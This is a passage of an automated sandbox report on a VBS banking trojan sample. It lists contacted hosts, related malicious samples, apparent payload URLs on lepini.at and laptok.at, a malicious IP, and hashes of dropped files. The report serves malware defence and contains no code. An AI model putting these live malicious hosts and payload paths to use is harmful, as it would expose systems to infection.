                                                                                                                                  http://buscador.terra.es/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://www.typography.netDexplorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://fontfabrik.comexplorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://search.orange.co.uk/favicon.icoexplorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://www.iask.com/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://www.tesco.com/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://cgi.search.biglobe.ne.jp/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    http://search.seznam.cz/favicon.icoexplorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://suche.freenet.de/favicon.icoexplorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://search.interpark.com/explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                                          high

                                                                                                                                          Contacted IPs

                                                                                                                                          • No. of IPs < 25%
                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                          • 75% < No. of IPs

                                                                                                                                          Public

                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                          47.241.19.44
                                                                                                                                          unknownUnited States
                                                                                                                                          45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue

                                                                                                                                          Private

                                                                                                                                          IP
                                                                                                                                          192.168.2.1

                                                                                                                                          General Information

                                                                                                                                          Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                          Analysis ID:322273
                                                                                                                                          Start date:24.11.2020
                                                                                                                                          Start time:20:33:23
                                                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                                                          Overall analysis duration:0h 12m 3s
                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                          Report type:full
                                                                                                                                          Sample file name:0xyZ4rY0opA2.vbs
                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                          Number of analysed new started processes analysed:36
                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                          Number of injected processes analysed:4
                                                                                                                                          Technologies:
                                                                                                                                          • HCA enabled
                                                                                                                                          • EGA enabled
                                                                                                                                          • HDC enabled
                                                                                                                                          • AMSI enabled
                                                                                                                                          Analysis Mode:default
                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                          Detection:MAL
                                                                                                                                          Classification:mal100.bank.troj.spyw.evad.winVBS@32/52@10/2
                                                                                                                                          EGA Information:
                                                                                                                                          • Successful, ratio: 50%
                                                                                                                                          HDC Information:Failed
                                                                                                                                          HCA Information:
                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                          • Number of executed functions: 55
                                                                                                                                          • Number of non-executed functions: 34
                                                                                                                                          Cookbook Comments:
                                                                                                                                          • Adjust boot time
                                                                                                                                          • Enable AMSI
                                                                                                                                          • Found application associated with file extension: .vbs
                                                                                                                                          Warnings:
                                                                                                                                          Show All
                                                                                                                                          • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                          • Exclude process from analysis (whitelisted): taskhostw.exe, rundll32.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                                                          • Excluded IPs from analysis (whitelisted): 104.42.151.234, 51.104.139.180, 104.108.39.131, 52.155.217.156, 20.54.26.129, 8.248.135.254, 67.26.75.254, 8.253.204.249, 8.241.123.126, 8.253.204.121, 152.199.19.161, 92.122.213.194, 92.122.213.247, 104.43.139.144, 51.104.144.132, 13.83.66.189, 13.83.66.62, 13.83.66.119, 13.83.65.212, 13.83.66.22, 13.88.85.215, 51.104.136.2, 20.49.150.241
                                                                                                                                          • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, www.tm.lg.prod.aadmsa.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, iecvlist.microsoft.com, go.microsoft.com, login.live.com, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, ie9comview.vo.msecnd.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, skypedataprdcolcus16.cloudapp.net, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus16.cloudapp.net, cs9.wpc.v0cdn.net
                                                                                                                                          • Execution Graph export aborted for target mshta.exe, PID 3096 because there are no executed function
                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                          Simulations

                                                                                                                                          Behavior and APIs

                                                                                                                                          TimeTypeDescription
                                                                                                                                          20:34:24API Interceptor1x Sleep call for process: wscript.exe modified
                                                                                                                                          20:35:44API Interceptor43x Sleep call for process: powershell.exe modified

                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                          IPs

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                          47.241.19.446Xt3u55v5dAj.vbsGet hashmaliciousBrowse
                                                                                                                                          • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                          JeSoTz0An7tn.vbsGet hashmaliciousBrowse
                                                                                                                                          • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                          1qdMIsgkbwxA.vbsGet hashmaliciousBrowse
                                                                                                                                          • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                          2Q4tLHa5wbO1.vbsGet hashmaliciousBrowse
                                                                                                                                          • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                          0wDeH3QW0mRu.vbsGet hashmaliciousBrowse
                                                                                                                                          • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                          0k4Vu1eOEIhU.vbsGet hashmaliciousBrowse
                                                                                                                                          • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                          earmarkavchd.dllGet hashmaliciousBrowse
                                                                                                                                          • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                          6znkPyTAVN7V.vbsGet hashmaliciousBrowse
                                                                                                                                          • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                          a7APrVP2o2vA.vbsGet hashmaliciousBrowse
                                                                                                                                          • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                          03QKtPTOQpA1.vbsGet hashmaliciousBrowse
                                                                                                                                          • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                          2200.dllGet hashmaliciousBrowse
                                                                                                                                          • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                          22.dllGet hashmaliciousBrowse
                                                                                                                                          • api10.laptok.at/favicon.ico
                                                                                                                                          mRT14x9OHyME.vbsGet hashmaliciousBrowse
                                                                                                                                          • api10.laptok.at/favicon.ico
                                                                                                                                          0RLNavifGxAL.vbsGet hashmaliciousBrowse
                                                                                                                                          • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                          1ImYNi1n8qsm.vbsGet hashmaliciousBrowse
                                                                                                                                          • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                          4N9Gt68V5bB5.vbsGet hashmaliciousBrowse
                                                                                                                                          • api10.laptok.at/favicon.ico
                                                                                                                                          34UO9lvsKWLW.vbsGet hashmaliciousBrowse
                                                                                                                                          • api10.laptok.at/favicon.ico
                                                                                                                                          csye1F5W042k.vbsGet hashmaliciousBrowse
                                                                                                                                          • api10.laptok.at/favicon.ico
                                                                                                                                          0cJWsqWE2WRJ.vbsGet hashmaliciousBrowse
                                                                                                                                          • api10.laptok.at/favicon.ico
                                                                                                                                          08dVB7v4wB6w.vbsGet hashmaliciousBrowse
                                                                                                                                          • api10.laptok.at/favicon.ico

                                                                                                                                          Domains

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                          resolver1.opendns.com6Xt3u55v5dAj.vbsGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          5fbce6bbc8cc4png.dllGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          JeSoTz0An7tn.vbsGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          1qdMIsgkbwxA.vbsGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          2Q4tLHa5wbO1.vbsGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          0wDeH3QW0mRu.vbsGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          0k4Vu1eOEIhU.vbsGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          earmarkavchd.dllGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          6znkPyTAVN7V.vbsGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          a7APrVP2o2vA.vbsGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          03QKtPTOQpA1.vbsGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          fY9ZC2mGfd.exeGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          H58f3VmSsk.exeGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          2200.dllGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          5faabcaa2fca6rar.dllGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          0RLNavifGxAL.vbsGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          1ImYNi1n8qsm.vbsGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          YjimyNp5ma.exeGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          0cJWsqWE2WRJ.vbsGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          08dVB7v4wB6w.vbsGet hashmaliciousBrowse
                                                                                                                                          • 208.67.222.222
                                                                                                                                          myip.opendns.com6Xt3u55v5dAj.vbsGet hashmaliciousBrowse
                                                                                                                                          • 84.17.52.25
                                                                                                                                          2Q4tLHa5wbO1.vbsGet hashmaliciousBrowse
                                                                                                                                          • 84.17.52.25
                                                                                                                                          earmarkavchd.dllGet hashmaliciousBrowse
                                                                                                                                          • 84.17.52.25
                                                                                                                                          6znkPyTAVN7V.vbsGet hashmaliciousBrowse
                                                                                                                                          • 84.17.52.25
                                                                                                                                          fY9ZC2mGfd.exeGet hashmaliciousBrowse
                                                                                                                                          • 84.17.52.40
                                                                                                                                          H58f3VmSsk.exeGet hashmaliciousBrowse
                                                                                                                                          • 84.17.52.40
                                                                                                                                          YjimyNp5ma.exeGet hashmaliciousBrowse
                                                                                                                                          • 84.17.52.40
                                                                                                                                          4.exeGet hashmaliciousBrowse
                                                                                                                                          • 84.17.52.10
                                                                                                                                          PtgzM1Gd04Up.vbsGet hashmaliciousBrowse
                                                                                                                                          • 84.17.52.10
                                                                                                                                          Win7-SecAssessment_v7.exeGet hashmaliciousBrowse
                                                                                                                                          • 91.132.136.164
                                                                                                                                          Capasw32.dllGet hashmaliciousBrowse
                                                                                                                                          • 84.17.52.80
                                                                                                                                          my_presentation_u6r.jsGet hashmaliciousBrowse
                                                                                                                                          • 84.17.52.22
                                                                                                                                          open_attach_k7u.jsGet hashmaliciousBrowse
                                                                                                                                          • 84.17.52.22
                                                                                                                                          ZwlegcGh.exeGet hashmaliciousBrowse
                                                                                                                                          • 84.17.52.22
                                                                                                                                          dokument9903340.htaGet hashmaliciousBrowse
                                                                                                                                          • 84.17.52.22
                                                                                                                                          look_attach_s0r.jsGet hashmaliciousBrowse
                                                                                                                                          • 84.17.52.22
                                                                                                                                          my_presentation_u5c.jsGet hashmaliciousBrowse
                                                                                                                                          • 84.17.52.22
                                                                                                                                          presentation_p6l.jsGet hashmaliciousBrowse
                                                                                                                                          • 84.17.52.22
                                                                                                                                          job_attach_x0d.jsGet hashmaliciousBrowse
                                                                                                                                          • 84.17.52.22
                                                                                                                                          UrsnifSample.exeGet hashmaliciousBrowse
                                                                                                                                          • 84.17.52.78
                                                                                                                                          c56.lepini.at6Xt3u55v5dAj.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          JeSoTz0An7tn.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          1qdMIsgkbwxA.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          2Q4tLHa5wbO1.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          0wDeH3QW0mRu.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          0k4Vu1eOEIhU.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          earmarkavchd.dllGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          6znkPyTAVN7V.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          a7APrVP2o2vA.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          03QKtPTOQpA1.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          2200.dllGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          0RLNavifGxAL.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          1ImYNi1n8qsm.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          http://c56.lepini.atGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44

                                                                                                                                          ASN

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                          CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC6Xt3u55v5dAj.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          http://qaht.midlidl.com/indexGet hashmaliciousBrowse
                                                                                                                                          • 8.208.98.199
                                                                                                                                          https://bit.ly/3nLKwPuGet hashmaliciousBrowse
                                                                                                                                          • 8.208.98.199
                                                                                                                                          Response_to_Motion_to_Vacate.docGet hashmaliciousBrowse
                                                                                                                                          • 47.254.169.80
                                                                                                                                          https://bit.ly/2UR10cFGet hashmaliciousBrowse
                                                                                                                                          • 8.208.98.199
                                                                                                                                          JeSoTz0An7tn.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          1qdMIsgkbwxA.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          https://bit.ly/3lYk4BxGet hashmaliciousBrowse
                                                                                                                                          • 8.208.98.199
                                                                                                                                          2Q4tLHa5wbO1.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          https://bouncy-alpine-yam.glitch.me/#j.dutheil@dagimport.comGet hashmaliciousBrowse
                                                                                                                                          • 47.254.218.25
                                                                                                                                          0wDeH3QW0mRu.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          0k4Vu1eOEIhU.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          https://bit.ly/35MTO80Get hashmaliciousBrowse
                                                                                                                                          • 8.208.98.199
                                                                                                                                          videorepair_setup_full6715.exeGet hashmaliciousBrowse
                                                                                                                                          • 47.91.67.36
                                                                                                                                          http://banchio.com/common/imgbrowser/update/index.phpGet hashmaliciousBrowse
                                                                                                                                          • 47.241.0.4
                                                                                                                                          earmarkavchd.dllGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          6znkPyTAVN7V.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          a7APrVP2o2vA.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          03QKtPTOQpA1.vbsGet hashmaliciousBrowse
                                                                                                                                          • 47.241.19.44
                                                                                                                                          1119_673423.docGet hashmaliciousBrowse
                                                                                                                                          • 8.208.13.158

                                                                                                                                          JA3 Fingerprints

                                                                                                                                          No context

                                                                                                                                          Dropped Files

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                          C:\Users\user\AppData\Local\Temp\earmark.avchd0k4Vu1eOEIhU.vbsGet hashmaliciousBrowse
                                                                                                                                            6znkPyTAVN7V.vbsGet hashmaliciousBrowse
                                                                                                                                              a7APrVP2o2vA.vbsGet hashmaliciousBrowse
                                                                                                                                                03QKtPTOQpA1.vbsGet hashmaliciousBrowse

                                                                                                                                                  Created / dropped Files

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{174A4BA0-2E8C-11EB-90EB-ECF4BBEA1588}.dat
                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):29272
                                                                                                                                                  Entropy (8bit):1.7720649020273236
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:IwzGcpri7GwpLCG/ap8zrGIpcKGvnZpv8Go5Pqp9CGo4NTzpm5GW55FTo4GW57Te:rJZ+Zo2z9W3toifFNTzMVbR6zfBWcpB
                                                                                                                                                  MD5:5DEB0017862BB790072DDA8EEEF8AAFC
                                                                                                                                                  SHA1:8BD7C747F7245B734663A5C908D0290990EBB0CB
                                                                                                                                                  SHA-256:A1C401660840580CFC4F5B57B922761BB12211301D6A7F20862D090191208B00
                                                                                                                                                  SHA-512:432F7AC02B586A2E793F97E81EC6B5E68F23888E45B29C8C08CCEF000D3779DFEC1FFECE426165C272A579BA48400FE206921121734AAE41229DC2675B218F1F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{32EE892B-2E8C-11EB-90EB-ECF4BBEA1588}.dat
                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):50312
                                                                                                                                                  Entropy (8bit):1.9926269390046003
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:rFrZbmZEv2Co9WttyifSc+zMG2Ba2D7jicONMDu3pMzt2pMzfVN2BzmWX+gpznM4:r/WdxUXbjhHrXsN1GoT
                                                                                                                                                  MD5:D35FC3A0C308572AE63AD8E3450AF5A3
                                                                                                                                                  SHA1:DE10833251B928FCF16135977FE49A6957956FAC
                                                                                                                                                  SHA-256:5716A2788A1843C69DA30A772150E337BA08C2C01FA7E8B9DCD4D4943FD3223B
                                                                                                                                                  SHA-512:E9EF63C1BDEA070C79C6A3FBFD6156432751D48411DA590D531EBCC08964B40CC8492A54AA4A06753C083C7F02B86A46B6580A2CA892D3558408E6D5745603EF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{174A4BA2-2E8C-11EB-90EB-ECF4BBEA1588}.dat
                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):28140
                                                                                                                                                  Entropy (8bit):1.9203254743011586
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:rsZfQE6uk2FjB2QkWLMKYNVUl1l0Ue14A:rsYvP2hwU4KEVs0T1b
                                                                                                                                                  MD5:04CE13E9E60268021A2B153BDC284B29
                                                                                                                                                  SHA1:093F6DC4ECD64DE541FC4D2B5A673AF7A7BB4B61
                                                                                                                                                  SHA-256:C40B1DEEF8302488CAEBE76A0F423A02E96ACE850E83B79C779A90CCE913AB77
                                                                                                                                                  SHA-512:C15486DB763028FEAD675EB82556FC0AFB95FFD13A57BEAAF9D383F5B2F76A5AF75FC4D1BE8FFF549E5E133828FA8E2AA83FBA8CED1CD38C127CE42D6BAAE29E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{32EE892D-2E8C-11EB-90EB-ECF4BBEA1588}.dat
                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):28144
                                                                                                                                                  Entropy (8bit):1.9210229833549737
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:rkZHQX6dkmFjN2OkWqMZYZHuf/7mBN01euf/7mBNgqA:rUwqGmhEqrZQHuf/yrYeuf/yrgN
                                                                                                                                                  MD5:446277B2CC8BEB2AEE3CF6EAE8184097
                                                                                                                                                  SHA1:4F9F8F577609D154DFF1E9C821D5F18462BBD506
                                                                                                                                                  SHA-256:BC0C130B9F3588CA51B75C9E74A7C3DD79180E7BCD4F9C733E67E6D583487FA7
                                                                                                                                                  SHA-512:6EA5B2559A3FB0ECEC0DE987F56025337B5FC939EE44C86C3C977C00A4C16F51501EC20C0F9EC424C468D3501C6C1D1B7A6FA508EE5A3913C7F1EBD1EABE6864
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{32EE892F-2E8C-11EB-90EB-ECF4BBEA1588}.dat
                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):28172
                                                                                                                                                  Entropy (8bit):1.9277011535168063
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:rEZzQ365kFFjl32nkWBMsYta5w3vlah5w3WuA:r08KKFhlGTaskau39ahu3WJ
                                                                                                                                                  MD5:075EB9154DCE3DF4101B287A04038523
                                                                                                                                                  SHA1:BC06A22A908AFB53D9D443E8A6C44584FDEE92B1
                                                                                                                                                  SHA-256:7B73AFD703CDF558FE5C9E56C4E58544BD72CBFF7B65BA546E9209BF205B5FF0
                                                                                                                                                  SHA-512:3BB5E46A9D203B05CACBD9A99B1E1EC6BE26C6AAED2DEC49A36AA547EBD1F6C70801BDF22BF85E713FB467F57BBD78D974039971FE057F153C667D7BFAFF1CAC
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):656
                                                                                                                                                  Entropy (8bit):5.096353243250623
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:TMHdNMNxOEi5jM5VnWimI002EtM3MHdNMNxOEi5j8VnWimI00OYGVbkEtMb:2d6NxOn6jSZHKd6NxOnESZ7YLb
                                                                                                                                                  MD5:287A90B0EE135AA2DB0A75E5B6A4BEA4
                                                                                                                                                  SHA1:1A93DE1F0B734695D330E6631C4B4483711ABE49
                                                                                                                                                  SHA-256:611AFC4DDDE83D2E7555471EA23AE111C6D02E9B437ED16DFEC65AFFB8B4A0A0
                                                                                                                                                  SHA-512:910F53D1AEC5ECBC7C822AE0602CCC40A4B5E1E4F05AB49873836978EC2D2D936DB7B60E1388EDE6612745CE8978AEACB3EDF45C76C809A0249B6CC0D00990F5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xee4d021a,0x01d6c298</date><accdate>0xee4d021a,0x01d6c298</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xee4d021a,0x01d6c298</date><accdate>0xee4f6471,0x01d6c298</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):653
                                                                                                                                                  Entropy (8bit):5.139791372155009
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:TMHdNMNxe2kGjoVnWimI002EtM3MHdNMNxe2kGjoVnWimI00OYGkak6EtMb:2d6Nxr4SZHKd6Nxr4SZ7Yza7b
                                                                                                                                                  MD5:63BA17D1901F41986964A41F76EB37ED
                                                                                                                                                  SHA1:43F2E9521C022F397297EC3CF55C479D6B68235C
                                                                                                                                                  SHA-256:5FE6A77273B7072613F3C03B3E0A26422D970A8A01DE4D7339BE35839C5E5CF9
                                                                                                                                                  SHA-512:50CA5688B9D04BF692C0DEDD34662BE6A8E351AB8301E9903BF59D580EB33D14ACABCC5503B614347B1E5DDA6B3001200210CB686C84DCD358AF71B59AF20E30
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xee483d63,0x01d6c298</date><accdate>0xee483d63,0x01d6c298</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xee483d63,0x01d6c298</date><accdate>0xee483d63,0x01d6c298</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                  Category:dropped
